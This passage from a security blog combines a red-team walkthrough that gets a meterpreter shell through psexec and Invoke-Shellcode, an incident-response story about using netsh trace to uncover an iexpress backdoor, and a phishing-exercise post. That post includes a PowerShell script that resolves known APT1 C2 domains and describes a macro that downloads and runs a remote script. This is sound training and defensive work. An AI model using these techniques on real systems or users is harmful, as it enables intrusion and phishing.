<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjECFgr_5gBeOW4w-mepF1yBSB6z82b_s-3WrMXQGys3B-vmqrk5-K28pmczHEtEtpfX_ikzCEOUtQO5-AGmmyAxx3Oa-QEc-08znkE3Pmzf_XEPj8QPopbvA426cX6KHamSojol6e8cuM/s1600/command.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjECFgr_5gBeOW4w-mepF1yBSB6z82b_s-3WrMXQGys3B-vmqrk5-K28pmczHEtEtpfX_ikzCEOUtQO5-AGmmyAxx3Oa-QEc-08znkE3Pmzf_XEPj8QPopbvA426cX6KHamSojol6e8cuM/s400/command.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Add Command to psexec_command</b></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
Next, we start the multi/handler with reverse_https:</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkHmKxHK6fqg5EWHBSgDwzEmc97RPbLM1PnXqGWawdVPcyU0_eUtmG1XBypnrXr3YydoOoY2lnJEx2suSCh7TfbXwZ8xPW2muYZNAdPkFpabgX1bf-DnyLsg_ik3FepI9Bdgi2xeCW428/s1600/handler.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkHmKxHK6fqg5EWHBSgDwzEmc97RPbLM1PnXqGWawdVPcyU0_eUtmG1XBypnrXr3YydoOoY2lnJEx2suSCh7TfbXwZ8xPW2muYZNAdPkFpabgX1bf-DnyLsg_ik3FepI9Bdgi2xeCW428/s400/handler.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Set Up Handler</b></td></tr>
</tbody></table>
Finally, we run the module. This uploads a service binary to run our single command. The single command is an encoded PowerShell script which is pulling down the larger Invoke-Shellcode script. <a href="http://www.exploit-monday.com/2012/08/powersploit-inject-shellcode-update.html">Invoke-Shellcode</a> is determining whether the system is x86 or x64, and injecting meterpreter shellcode into an appropriate process:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWLNKFmd-xyYc9dlL0fGlJoEWzsATPSk1qRl4rtrtN_CkuS1QgaOuaxhJiej_gzjkLTKgVCdAKBKWo0DV900Sy0rmdHdnW2heDP7rWEH_YrdJ9d54IxPgmEi0I8Ywzi1kXuug2CzOSy3E/s1600/shell.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWLNKFmd-xyYc9dlL0fGlJoEWzsATPSk1qRl4rtrtN_CkuS1QgaOuaxhJiej_gzjkLTKgVCdAKBKWo0DV900Sy0rmdHdnW2heDP7rWEH_YrdJ9d54IxPgmEi0I8Ywzi1kXuug2CzOSy3E/s400/shell.PNG" width="390" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Get Your Shell</b></td></tr>
</tbody></table>
The end result is a meterpreter shell without writing anything more to disk than the psexec_command module does (notice the less than ideal bat files in the above screenshot). This method has proven to be reliable for me over the last few months with lots of other tools as well. I hope you find it useful and maybe someone will be inspired to automate this all into a single module.<br />
<br />
As soon as the<a href="http://passing-the-hash.blogspot.com/2012/08/breaking-news-pth-suite-now-in-backtrack.html"> PTH-Suite</a> is ported to Kali, I hope to show you how to accomplish all of this without writing anything to disk!<br />
<br />
***Updated 8/8/2013<br />
So after a few comments and working through encoding issues with several people I finally realized that the actual posted code was incomplete. Instead of working from the post, I continued to work from my own script which was just simply not smart. So I added a screenshot for extra clarity and I apologize to anyone that this frustrated. On the positive side, now there are loads of other ways to pull this off which I wrote about <a href="http://passing-the-hash.blogspot.com/2013/07/WMIS-PowerSploit-Shells.html">here</a> and you can read more about <a href="http://securitypadawan.blogspot.com/2013/07/authenticated-metasploit-payloads-via.html">here</a> and <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/psexec_psh.rb">here</a>.<br />
<br />
<br />
-Chris<br />
<br /></div>
Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com18tag:blogger.com,1999:blog-8453453300736107961.post-44124834452839344782013-03-26T00:48:00.000-04:002013-03-26T00:48:09.987-04:00Capturing Bad Packets with NetshI don't write defensive or incident response posts very often, but here goes:<br />
<br />
A few weeks ago, a friend shared a problem. For the past 3 days, between 8:30 and 9:00 AM, one of his company's remote servers would initiate an outbound connection to one of 3 different external IP addresses. He noticed the anomaly while reviewing network flow data. The reason he found it alarming was that it was using port 8443 which was allowed outbound by the firewall and was not being proxied.<br />
<br />
His first step was to look to see if anything was out of place on the box. He reviewed the event logs and saw nothing out of the ordinary. He also maintains a directory listing of every server's system folder to compare against (awesome idea). He was stumped and wanted to avoid playing his hand or having to travel so he reached out for help. He also shared that his boss was acting strange which led him to believe that they were being red-teamed (which should not happen!).<br />
<br />
My suggestion was to use something I learned about while writing <a href="http://www.obscuresecurity.blogspot.com/2013/02/shmoocon-firetalks-and-epilogue.html">Invoke</a>-<a href="https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot">Twitterbot</a>, a cool feature of Windows 7 and newer systems called <a href="http://blogs.msdn.com/b/canberrapfe/archive/2012/03/31/capture-a-network-trace-without-installing-anything-works-for-shutdown-and-restart-too.aspx">Netsh trace</a>. This allows you to do full system event tracing as well as packet captures without installing any additional software on the target system. The command looks something like this:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp7tQJoWUdSZzi_P-IRnD0YPJFlXry4m1pz9MJ29-VU6l_E2YGSO-u55baKenbKy8l_EeQC9OzoBvybQm7MkFmGbV_3bZY0Qv04ZAjwYTMyvMiTOFxsDgydSGZD3gB0-rdFQhQ7H9KbFc/s1600/netsh.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp7tQJoWUdSZzi_P-IRnD0YPJFlXry4m1pz9MJ29-VU6l_E2YGSO-u55baKenbKy8l_EeQC9OzoBvybQm7MkFmGbV_3bZY0Qv04ZAjwYTMyvMiTOFxsDgydSGZD3gB0-rdFQhQ7H9KbFc/s400/netsh.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b><span style="font-size: small;">netsh trace start capture=yes maxSize=10MB tracefile=c:\capture.etl</span></b></td></tr>
</tbody></table>
For <a href="http://www.obscuresecurity.blogspot.com/2012/03/local-accounts-arent-safer.html">obvious reasons</a>, he didn't want to interactively logon or use psexec to administer the potentially compromised machine. After some discussion, he opted to use the <a href="http://blogs.msdn.com/b/wmi/archive/2010/01/06/wmic-vs-wmi-powershell-cmdlets.aspx">Invoke-WmiMethod</a> in PowerShell to start the netsh capture remotely at 8:30 the next morning.<br />
<br />
After pulling the etl and cab files down, he let me have a look at them. In order to view the output, you need to install <a href="http://www.microsoft.com/en-us/download/details.aspx?id=4865">Microsoft's Netmon</a>. Using the "Windows Parser" you can clearly see the strange traffic:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghUzwXcXd8ayYlX55n1MED1W6fHS6gUHDNfN4IrIoJJWmzCEd61fDavgipAS6HT6TWJI68f5XYe2fS9J2pemElXLHB79mf39_6cSanif1yUFq1slvng8m3Y25m_EL4ey_kRvyYrnXYCPU/s1600/packets.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghUzwXcXd8ayYlX55n1MED1W6fHS6gUHDNfN4IrIoJJWmzCEd61fDavgipAS6HT6TWJI68f5XYe2fS9J2pemElXLHB79mf39_6cSanif1yUFq1slvng8m3Y25m_EL4ey_kRvyYrnXYCPU/s400/packets.PNG" width="400" /></a></div>
<br />
The traffic was easy to correlate to successful login events, but there were 2 processes that seemed to tell a lot of the story. One process was for <a href="http://technet.microsoft.com/en-us/sysinternals/bb897557.aspx">BGinfo</a> which I confirmed was an allowed application that was left in the startup folder (not a good practice).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrlgtkFIGiS5w_hu8kYkOenN-QSL1eJ2BdrR6mwrOnLk-ahloXhhdpwbthrLoBoKLARQni8wBAzEuAx-XJFeN3YyCb7M-ycwuDYpnB89gnoRuD4L8y8IQzXD-BavGxqC3qXEokiJsP2p0/s1600/netmon.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrlgtkFIGiS5w_hu8kYkOenN-QSL1eJ2BdrR6mwrOnLk-ahloXhhdpwbthrLoBoKLARQni8wBAzEuAx-XJFeN3YyCb7M-ycwuDYpnB89gnoRuD4L8y8IQzXD-BavGxqC3qXEokiJsP2p0/s400/netmon.PNG" width="400" /></a></div>
<br />
The other process that is created around the same time was for a bginf.exe. After looking at the behavior of the actual BGinfo, we determined that it doesn't leave a process running and it most definitely isn't started like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVlzNeE4u9OOtSiXqb4OD2LO2Axb6GmdexTW_akimIL8rplXWndZVLfaqai54iLuumpIpCapzK9o8rhjp_EZIgNFrknIVuk8YjWOBNwi_LYJ7DIrTCIjovQ3Nk_LFmT8ZZlpGxUfNOrIs/s1600/iexpress.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVlzNeE4u9OOtSiXqb4OD2LO2Axb6GmdexTW_akimIL8rplXWndZVLfaqai54iLuumpIpCapzK9o8rhjp_EZIgNFrknIVuk8YjWOBNwi_LYJ7DIrTCIjovQ3Nk_LFmT8ZZlpGxUfNOrIs/s400/iexpress.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
We had discovered a pentester's clever persistence mechanism. He or she had used the built-in Microsoft utility<a href="http://www.irongeek.com/i.php?page=videos/binders-iexpress-trojans"> iexpress</a> to hide their backdoor in a file that already existed in the startup directory. After pulling down the binary and extracting the bginf.exe, it was pretty obvious:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ9m_eyuMbZsM5ic1m8xx3sPXTXRYp52yBqKpd0RX5p6H5Ugb2strIFxa_m20FKFiF0CW5DTu-BBcteTT6l7PAEGyb8_VW2JNIzsp6vRbXzl2z81vv-oSLKDu01w1tO_3KgZb7ec9YwYk/s1600/Capture.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ9m_eyuMbZsM5ic1m8xx3sPXTXRYp52yBqKpd0RX5p6H5Ugb2strIFxa_m20FKFiF0CW5DTu-BBcteTT6l7PAEGyb8_VW2JNIzsp6vRbXzl2z81vv-oSLKDu01w1tO_3KgZb7ec9YwYk/s400/Capture.PNG" width="300" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b><span style="font-size: small;">Results from http://vscan.novirusthanks.org/ </span></b></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
A quick note, be careful submitting samples to VirusTotal or any online scanner. It could definitely<a href="https://github.com/mubix/vt-notify"> tip your hand</a>.<br />
<br />
So now we know there is something bad persisting on the server. How did it get there? What credentials did they steal? How far are they in the network? What do I do next? All valid questions that we all have to figure out each time a compromise is discovered whether its a red team or not.<br />
<br />
Thanks for reading and maybe someone else will find this netsh trick useful in an IR situation. <br />
<br />
-Chris<br />
<br />Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com5tag:blogger.com,1999:blog-8453453300736107961.post-62420604403726342632013-02-27T19:39:00.001-05:002013-02-27T20:40:57.668-05:00DIY Phishing Exercises with PowerShellOne task that I have grown to hate is sending phishing emails. As a Red-teamer, I realize they almost always work and in most cases its the most likely (but not only) attack vector. If the attempt is caught, you could face much tougher scrutiny attempting future attacks. As such, its something that I normally do after exhausting other methods or by prepping with extensive recon and social-engineering (physical and telephonic). However, I feel like organizations should be regularly testing themselves or using a <a href="http://www.phishme.com/">service</a> and not waiting for a pentester to tell them that their user's will click on almost anything.<br />
<br />
Not long after releasing the <a href="http://www.obscuresecurity.blogspot.com/2013/02/shmoocon-firetalks-and-epilogue.html">PowerShell bot</a> script, a friend asked how he could use the <a href="https://raw.github.com/obscuresec/shmoocon/master/Send-Phishing">Send-Phishing</a> script to test his organization. His company has a limited budget but they have a motivated and security-conscience IT staff. During the conversation, we came up with a few ideas on how to script out a phishing exercise complete with consequences. The goal is not to test whether malicious payloads can get in (they can), but the user's, admin's and security guy's reaction times. He wanted the test to be repeatable, low-cost and focus on learning at the expense of realism.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3sl0odennq_ZS_uniZ0ElWjyBpH0pLyAWugNOkyQ-27frEyaoLFSf5uJ8wl33VMdB0hRbPi2Qv4U0IYztGr7B_97uBcFvEpOybthK1_CkpN_h32k2-7ZIclvrCBOURItU9E71wUrMvVk/s1600/Picture1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3sl0odennq_ZS_uniZ0ElWjyBpH0pLyAWugNOkyQ-27frEyaoLFSf5uJ8wl33VMdB0hRbPi2Qv4U0IYztGr7B_97uBcFvEpOybthK1_CkpN_h32k2-7ZIclvrCBOURItU9E71wUrMvVk/s400/Picture1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<b>Send-Phishing PowerShell Script</b></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
The responsibility for running the tests will rotate between two people who will be responsible for developing the ruse (sometimes the hardest part). The first exercise used the example that I provided during my recent talks and it is a good start. The payload is an easy <a href="https://github.com/obscuresec/shmoocon/blob/master/PowerShellOfficeMacro">VBA macro</a> embedded in an Excel spreadsheet. The macro hides the desired content behind a fake warning which instructs the user to enable macros if the macros aren't already enabled. This method has been around for a very long time, but the first time I saw it was in a phishing email to me from a pentester five or so years ago.<br />
<br />
This "attack" could easily be prevented if users aren't allowed to enable macros but I find it rare that accounting/HR aren't allowed to. If only signed macros are allowed, then sign yours. A code-signing certificate is not expensive for an attacker. Since this is only an exercise, you can self-sign it. Make your payload work for the sake of the exercise.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxIQiIQeJ20zIva_EU34GnDI3kSYOtedn0UnpBaQ0B6UbmqWW0EiVl7Ym8pjomu5SbjshTHBci174noNe3J6PdazL4qze9RJpgUddq6uwsrkIXwEeNsVsEeXKZ9gBAgicum2ThSmk5-BY/s1600/Picture3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxIQiIQeJ20zIva_EU34GnDI3kSYOtedn0UnpBaQ0B6UbmqWW0EiVl7Ym8pjomu5SbjshTHBci174noNe3J6PdazL4qze9RJpgUddq6uwsrkIXwEeNsVsEeXKZ9gBAgicum2ThSmk5-BY/s400/Picture3.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Macro that Hides Content and Executes Remote PowerShell Script</b></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1fdkynT_yF9fLPnCqfFTYvNdxa1lEpcv-PVBgkiLJuzraugM5WzffRdvTaItkE3Oo9-Hfi5E_I1lApwOg4pwteO59DFeGLmXZ3s4x1NCjLZWcCbQmq4daPSerSHDBgEMFsgmEQ3KlytA/s1600/Picture4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1fdkynT_yF9fLPnCqfFTYvNdxa1lEpcv-PVBgkiLJuzraugM5WzffRdvTaItkE3Oo9-Hfi5E_I1lApwOg4pwteO59DFeGLmXZ3s4x1NCjLZWcCbQmq4daPSerSHDBgEMFsgmEQ3KlytA/s400/Picture4.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b style="font-size: medium;">The Content the User is Expecting</b></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiWqY0oG3BCbSYBqnVLBPKkQNqR-YwHNwpP1udFzIfZLF9hNyMiBJn_9sSFhlj_xBTZyf3vwdHeALsk7tljv0k91NvCO27ITsumixeL9ysrpkLM8MF30SydqZyU18R9cq9f8zTpklsVTo/s1600/Picture2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiWqY0oG3BCbSYBqnVLBPKkQNqR-YwHNwpP1udFzIfZLF9hNyMiBJn_9sSFhlj_xBTZyf3vwdHeALsk7tljv0k91NvCO27ITsumixeL9ysrpkLM8MF30SydqZyU18R9cq9f8zTpklsVTo/s400/Picture2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="separator" style="clear: both; font-size: medium;">
<b>Fake Message User Receives if Macros Aren't Enabled</b></div>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Next, we borrowed some of the features of the <a href="https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot">TwitterBot</a> to create opportunities for each level to detect and respond to the phishing attempt. Each phase is implemented in a PowerShell script that is downloaded and executed by the macro:</div>
<br />
<ul>
<li>Phase 0: The user receives the email and attachment.</li>
<li>Phase 1: User receives a popup message notifying them of the compromise.</li>
<li>Phase 2: Antivirus is flagged which should notify the AV admin of suspicious activity.</li>
<li>Phase 3: A known malicious C2 domain name is resolved by the "compromised" host.</li>
<li>Phases 4 - 9: Hacker activities are notionally conducted and story is written to the log.</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnfVQmWS9YRiiy9YL_kIZ0xx4JAIrISBxPreB0UET-adfQJUu18vRIB0xv5CJYGB693X7qGZUnwNQVY4qTQ7_odhAK_mICPAPNUioMCZYJXTjFnXwboK7YqruhkXJK1MDJtyBBchjid50/s1600/picture8.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnfVQmWS9YRiiy9YL_kIZ0xx4JAIrISBxPreB0UET-adfQJUu18vRIB0xv5CJYGB693X7qGZUnwNQVY4qTQ7_odhAK_mICPAPNUioMCZYJXTjFnXwboK7YqruhkXJK1MDJtyBBchjid50/s400/picture8.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Phase 1 Warning Message with Encoded Location of Log File</b></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoywHzStbH_HkGZkd3YCMs0y2LpkgkOsGNswTKv5CuEfj2XmjQNLcCN2pRuunLQK0d93TIAjSl4cg7mtNAJZ2Fb8IRHA4MV63afuCPDddX9DQGQCvXF0TS99uiLtOtFo19EAYs2PcUWC0/s1600/AV_alert.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoywHzStbH_HkGZkd3YCMs0y2LpkgkOsGNswTKv5CuEfj2XmjQNLcCN2pRuunLQK0d93TIAjSl4cg7mtNAJZ2Fb8IRHA4MV63afuCPDddX9DQGQCvXF0TS99uiLtOtFo19EAYs2PcUWC0/s400/AV_alert.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Phase 2 Antivirus Warning Message</b></td></tr>
</tbody></table>
<div>
I would like to stress that the overall story and activities are only generally realistic, there is no way to accurately predict how long each step would or could take. For a free exercise (there is opportunity cost, but no high-dollar consultant expenses), I think it works. Obviously, the story and timeline can be tailored to fit your organization's expected (or already discovered) threat actors. </div>
<br />
<br />
Careful consideration should be given to the fact that some learned concepts could have adverse affects on your organization's security. For example, the odds that a targeted attacker would pop a message to your user or flag AV are very slim. These steps should only be used to generate some initial awareness and should be removed from future tests. Furthermore, you analysts should learn to identify unknown C2 domains instead of relying solely on signatures. However, this is just a beginner exercise so treat it as such.<br />
<br />
The function below was hosted on Github with a call to "<a href="https://github.com/obscuresec/random/blob/master/Get-PhishingExercise">Get-PhishingExercise</a>" added to it:<br />
<br />
<b> Get-PhishingExercise </b><textarea cols="60" name="Get-PhishingExercise" readonly="readonly" rows="50" wrap="off">Function Get-PhishingExercise {
<#
.NAME
Get-PhishingExercise
.SYNOPSIS
Get-PhishingExercise
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
.DESCRIPTION
This script was created to be used with a client-side phishing test.
.PARAMETER SecondsWaited
Specifies the number of seconds to wait in between each phase of the test.
.LINK
https://github.com/obscuresec/random/Get-PhishingExercise
.NOTES
This script won't be used in the normal fashion and should be tailored each test.
#>
[CmdletBinding()] Param(
[ValidateNotNullOrEmpty()]
[int32] $SecondsWaited = '600'
)
#Generally bad form, but since this will be in the background its probably the right call
$ErrorActionPreference = 'SilentlyContinue'
$StartTime = Get-Date
#Create random logname to disguise it a bit
[string] $LogTitle = (-join ([Char[]]'abcdefghijklmnopqrstuvwxyz1234567890' | Get-Random -Count 16)) + ".log"
#Pick a location to change it up for each machine, add more if necessary
[int32] $LocationNumber = (Get-Random 3)
if ($LocationNumber -eq 0) {$LogPath = $Env:TEMP}
if ($LocationNumber -eq 1) {$LogPath = $Env:PUBLIC}
if ($LocationNumber -eq 2) {$LogPath = $Env:APPDATA}
[string] $LogFile = Join-Path $LogPath $LogTitle
#Phase 0, the user has the opportunity to self-report
[string] $LogMessage = "$Env:USERNAME enabled the macro at $StartTime. The user should be thanked for reporting, but reminded not to open unknown files."
Add-Content -Value $LogMessage -Path $LogFile
Start-Sleep -Seconds $SecondsWaited
#Phase 1, the user receives a warning to call and is instructed to give the encoded location of log file
$PopupTime = Get-Date
$PopupTitle = 'Your Computer is Compromised!'
#Don't want the user to delete log file so we will encode it!
$StringBytes = [System.Text.Encoding]::UTF8.GetBytes($LogFile)
$EncodedLogFile = [System.Convert]::ToBase64String($StringBytes)
$PopupMessage = "Please immediately contact your security point-of-contact! Code: $EncodedLogFile"
Add-Type -AssemblyName "System.Drawing","System.Windows.Forms"
[Windows.Forms.MessageBox]::Show($PopupMessage, $PopupTitle, [Windows.Forms.MessageBoxButtons]::OK, [Windows.Forms.MessageBoxIcon]::Information) | Out-Null
$LogMessage = "At $PopupTime $Env:USERNAME was warned with a popup with the following message: $PopupMessage. User must be retrained."
Add-Content -Value $LogMessage -Path $LogFile
$AcceptTime = Get-Date
$LogMessage = "At $AcceptTime $Env:USERNAME clicked on the message. Why didn't they report this?"
Add-Content -Value $LogMessage -Path $LogFile
Start-Sleep -Seconds $SecondsWaited
#Phase 2, activity flags antivirus which should report to a centralized server and give log directory
[string] $EncodedEicar = 'WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo='
$EicarBytes = [System.Convert]::FromBase64String($EncodedEicar)
[string] $Eicar = [System.Text.Encoding]::UTF8.GetString($EicarBytes)
$EicarPath = Join-Path $LogPath Eicar.com
Set-Content -Value $Eicar -Encoding ascii -Path $EicarPath -Force
$EicarTime = Get-Date
$LogMessage = "At $EicarTime, the Eicar string was written to $EicarPath. How long does it take for the AV admin to notice?"
Add-Content -Value $LogMessage -Path $LogFile
Start-Sleep -Seconds $SecondsWaited
#Phase 3, the machine begins resolving malicious domains which should flag network IDS
#Pick a random evil C2 location to resolve (taken from Mandiant APT1 report)
[int32] $LocationNumber = (Get-Random 5)
Switch ($LocationNumber) {
0 {$EvilC2 = 'applesoftupdate.com'}
1 {$EvilC2 = 'java.earthsolution.org'}
2 {$EvilC2 = 'news.nytimesnews.net'}
3 {$EvilC2 = 'sea.arrowservice.net'}
4 {$EvilC2 = 'www.uszzcs.com'}
}
#Format path to look something like a URL
[string] $HintUrl = ($LogFile.replace('\','.')).Substring(3)
$LoopRange = 1..25
$RangeCount = $LoopRange.Count
For ($i=0; $i -lt $RangeCount; $i++) {
#Resolve the malicious hostname and attempt to resolve to give directory name to analyst
[System.Net.Dns]::GetHostAddresses($EvilC2) | Out-Null
[System.Net.Dns]::GetHostAddresses($HintUrl) | Out-Null
#Clear the dns cache to force another resolution, easy with powershell 3 but not 2
Invoke-Expression 'ipconfig /flushdns'
Start-Sleep -Seconds 30
}
$C2Time = Get-Date
$LogMessage = "At $C2Time, attackers established C2 of compromised machine using $EvilC2. A full investigation is now required."
Add-Content -Value $LogMessage -Path $LogFile
Start-Sleep -Seconds $SecondsWaited
#Phase 4, this is a notional phase where the script includes local privilege escalation
$Phase4Time = Get-Date
$LogMessage = "At $Phase4Time, attackers escalated local privileges to SYSTEM. A enterprise-wide investigation is now required."
Add-Content -Value $LogMessage -Path $LogFile
Start-Sleep -Seconds $SecondsWaited
#Phase 5, this is a notional phase where the script includes PTH to admin token
$Phase5Time = Get-Date
$LogMessage = "At $Phase5Time, attackers passed the local administrator hash to an administrator's machine. All accounts must be locked and passwords reset during remediation effort."
Add-Content -Value $LogMessage -Path $LogFile
Start-Sleep -Seconds $SecondsWaited
#Phase 6, this is a notional phase where the script includes impersonating domain admin token
$Phase6Time = Get-Date
$LogMessage = "At $Phase6Time, attackers secure domain administrator rights and steal all user's hashes. A complete domain rebuild will be necessary."
Add-Content -Value $LogMessage -Path $LogFile
Start-Sleep -Seconds $SecondsWaited
#Phase 7, this is a notional phase where the script includes targeting of sensitive business data
$Phase7Time = Get-Date
$LogMessage = "At $Phase7Time, attackers secure access to the sensitive R&D server and steal IP. The company is now at risk of losing all competitive advantage and profitibility."
Add-Content -Value $LogMessage -Path $LogFile
Start-Sleep -Seconds $SecondsWaited
#Phase 8, this is a notional phase where the script includes exfiltration of sensitive business data
$Phase8Time = Get-Date
$LogMessage = "At $Phase8Time, attackers exfil the crown jewels and begin hiding tracks."
Add-Content -Value $LogMessage -Path $LogFile
Start-Sleep -Seconds $SecondsWaited
#Phase 9, notional final phase
$Phase9Time = Get-Date
$LogMessage = "At $Phase9Time, this exercise ends. Thankfully this was only an exercise."
Add-Content -Value $LogMessage -Path $LogFile
}
</textarea><br />
<br />
The function has a few concepts that I now use regularly. I love to the Get-Random commandlet because it adds a bit of unpredictable behavior. For example, there are several options where the function can store the log and the name of the log file itself is random. [Note: The first time that this was actually used, one of the user's actually deleted the log after reading it (which itself is a problem) but I chose to encode it in the message to prevent that from easily happening again.]<br />
<br />
Make sure you and your organization are comfortable with what the script is doing. If you don't have active rules to detect and prevent the resolution of known malicious hostnames, don't use the phase 3 portion. The use of those hostnames was prompted by the recently released <a href="http://intelreport.mandiant.com/">Mandiant report</a> which has resulted in many updates to network security products and their signatures. Those 5 domains should all flag your IDS. If you haven't read the report and its appendices in its entirety, you should!<br />
<br />
Next, the URL to the hosted script was shortened with a <a href="http://www.obscuresecurity.blogspot.com/2013/01/Get-ShortenedURL.html">shortener</a>. Now we have the one-liner that will download and execute our script:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
